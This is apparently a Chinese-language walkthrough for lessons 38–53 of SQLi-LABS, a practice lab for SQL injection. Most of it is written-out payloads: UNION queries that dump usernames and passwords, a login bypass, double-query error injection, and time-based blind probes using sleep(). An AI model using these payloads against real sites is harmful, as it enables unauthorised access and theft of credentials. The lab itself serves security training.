SQLi-LABS-Page-3-less-38-53注入教程

Lesson - 38GET - Stacked Query Injection - String堆叠的查询
输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号， 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来，http://sql/Less-38/?id=-1%20%27union%20select%201,2,database()%20%23 爆出了security，thenhttp://sql/Less-38/?id=-1 'union select 1,2,table_name from information_schema.tables where table_schema="security" limit 3,1 #爆出user
用这个爆出结果http://sql/Less-38/?id=-1%20%27union%20select%201,2,concat_ws(0x3a,id,username,password)%20from%20users%20limit%200,1%23

Lesson - 39GET - Stacked Query Injection - intiger based 这道题跟上面的差不多，直接套路来
http://sql/Less-39/?id=-1%20UNION%20SELECT%201,2,TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=%22security%22%20limit%203,1%23

Lesson - 40 GET - Blind Based - String - Stacked 盲注
http://sql/Less-40/?id=1%27%20and%20%271%27=%272
语句是SELECT * FROM users WHERE id=(‘-1’ ) union select 1,2,database() #’) LIMIT 0,1 后面自己干
http://sql/Less-40/?id=-1' ) union select 1,2,database() %23

Lesson - 41 GET - Blind Based - intiger - Stacked 盲注注入注入，还是没有单引号的，上手干呗
http://sql/Less-41/?id=-1 union select 1,2,table_name from information_schema.tables where table_schema="security" limit 3,1 %23

Lesson - 42 POST - Error based - String - stacked 表单注入
这里下面的两个点进去都没用，注入了下帐号发现也不行，审计下发现$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];对username转译（mysqli_multi_query函数）了，我们可以在password处输入“1’or 1=1 #”进行绕过，登录进去后发现更新密码功能 ，说明可以用password这里进行注入啊，多次尝试后发现这里用双注入查询才可以,这里放一个开头查询database的码，剩下的可以把最里面的查询语句进行替换哦，做还是可以做出来的就是太麻烦了password: -1' union select 1 from (select+count(*),concat(( database()),floor(rand(0)*2))a from information_schema.tables group by a)b #

Lesson - 43 POST - Error based - String - Stacked with twist
按着上面的继续，发现报错出现“ ‘）”,那么可以猜到后台的password周围是“ (‘password’)”，那么注入为“ 1’)or 1=1 # ” 那么剩下的就很简单了，跟上面的一样双注入吧爆出了column来-1')union select 1 from (select count(*),concat(( select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x656D61696C73 limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a)b #

Less - 44 Stacked Query blind 层次化查询 盲注 输入后发现未报错，只能慢慢尝试，在输入了0' union select 1,database(),3 or 1=1 #后报出答案，然后 0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # 显示出table_name剩下自己做。

Less - 45 POST - Error based - String - Stacked - Blind 盲注
跟上面的差不多，进行测试时发现用1')or 1=1 #可以，也就是说password周围有“’( )’”，那么进行测试这里测一下库0') union select 1,database(),3 or 1=1 #

Less - 46 ORDER BY-Error-Numeric GET - 基于错误 - 数字型 - ORDER BY 从句后台代码是“ $sql = "SELECT * FROM users ORDER BY$id”;” 还有提示信息 Please input parameter as SORT with numeric value ，有了order by 就不能用union查询，那么尝试用布尔或时间注入判断http://sql/Less-46/?sort=1%20and%20(length(database()))%20=%208%20and%20if(1=1,%20sleep(5),%20null)通过时间判断database()长度，太麻烦了直接跳过，感兴趣的自己做吧

Less - 47 ORDER BY Clause-Error-Single quote ORDER BY 从句 - 基于错误-单引号 输入
都一样的，先用时间盲注测试想要的基本信息http://sql/Less-47/?sort=1%27%20and%20if(1=1,%20sleep(1),%20null)%20and%20%271%27=%271通过时间注入判断是否存在注入点，剩下的跟上面一样

Less - 48 ORDER BY Clause Blind based ORDER BY 从句 基于盲注
输入了单引号，未爆出任何信息http://sql/Less-48/?sort=1%27试了好几次（ ’ ,’),”,”)）发现，sort周围没有引号括号，那么直接上手http://sql/Less-48/?sort=1%20and%20if(1=1,sleep(1),null)看出时间延长那么就可以确定了，剩下的自己手工检测吧。

Less - 49 ORDER BY Clause Blind based ORDER BY 从句 基于盲注
测试发现 参数加上双引号可以显示 ，那么就是周围有单引号,进行测试封闭单引号。http://sql/Less-49/?sort=1%27%20and%20if%20(1=1,sleep(1),null)%20and%20%271%27=%271

Less - 50 ORDER BY Clause Blind based：ORDER BY 从句 基于盲注
http://sql/Less-50/?sort=1%20and%20if(1=1,sleep(1),null)，输入发现时间延长，那么测试成功?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

Less - 51 ORDER BY Clause Blind based：ORDER BY 从句 基于盲注,测试发现参数周围存在单引号，
http://sql/Less-51/?sort=1%27%20and%20if(1=1,%20sleep(1),%20null)%20and%20%271%27=%271

Less - 52 ORDER BY Clause Blind based ORDER BY 从句 基于盲注,
测试发现参数周围没有符号，那么可以直接注入，?sort=1 and if(1=1, sleep(1), null)

Less - 53 ORDER BY Clause Blind based ：ORDER BY 从句 基于盲注 通过“?sort=1”和?sort=1’ ”可以确定周围有单引号，剩下的自己做吧?sort=1' and if(1=1, sleep(1), null) and '1'='1